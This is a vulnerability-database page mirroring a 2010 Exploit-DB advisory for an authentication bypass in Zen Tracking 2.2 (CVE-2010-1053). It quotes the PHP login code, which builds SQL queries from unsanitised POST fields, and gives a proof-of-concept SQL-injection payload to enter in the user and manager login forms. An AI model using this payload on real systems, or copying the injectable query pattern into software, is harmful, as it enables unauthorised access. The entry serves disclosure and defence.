Lucene search
+L

Zen Tracking 2.2 - Authentication Bypass

🗓️ 07 Feb 2010 00:00:00Reported by cr4wl3rType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 40 Views

Authentication Bypass in Zen Tracking 2.

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2010-1053
7 Feb 201000:00
circl
cve
CVE
CVE-2010-1053
22 Mar 201018:17
cve
cvelist
Cvelist
CVE-2010-1053
22 Mar 201018:17
cvelist
euvd
EUVD
EUVD-2010-1085
7 Oct 202500:30
euvd
nvd
NVD
CVE-2010-1053
23 Mar 201001:00
nvd
openvas
OpenVAS
Zen Time Tracking multiple SQL Injection vulnerabilities
6 Apr 201000:00
openvas
prion
Prion
Sql injection
23 Mar 201001:00
prion
[+] Zen Tracking <= 2.2 (Auth Bypass) SQL Injection Vulnerability
[+] Discovered by cr4wl3r <cr4wl3r[!]linuxmail.org>
[+] Download : http://scripts.ringsworld.com/calendars/zentimetracking/

[+] Vuln Code :

[userlogin.php]

if (!empty($_POST['password']))
{
   $username =$_POST['username'];
   $password =$_POST['password'];
   dbConnect();
   $result1 = mysql_query("select * from ".$tbluser." where username='". $username ."' and password='". $password ."'".  mysql_error());

[+] PoC :

[ZenTracking_path]/userlogin.php

username: ' or' 1=1
Password: ' or' 1=1


[+] Vuln Code :

[managerlogin.php]

if (!empty($_POST['password']))
{
   $username =$_POST['username'];
   $password =$_POST['password'];
   dbConnect();
   $result1 = mysql_query("select * from ".$tblmanager." where username='". $username ."' and password='". $password ."'".  mysql_error());

[+] PoC :

[ZenTracking_path]/managerlogin.php

username: ' or' 1=1
Password: ' or' 1=1

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

07 Feb 2010 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 26.8
EPSS0.00914
40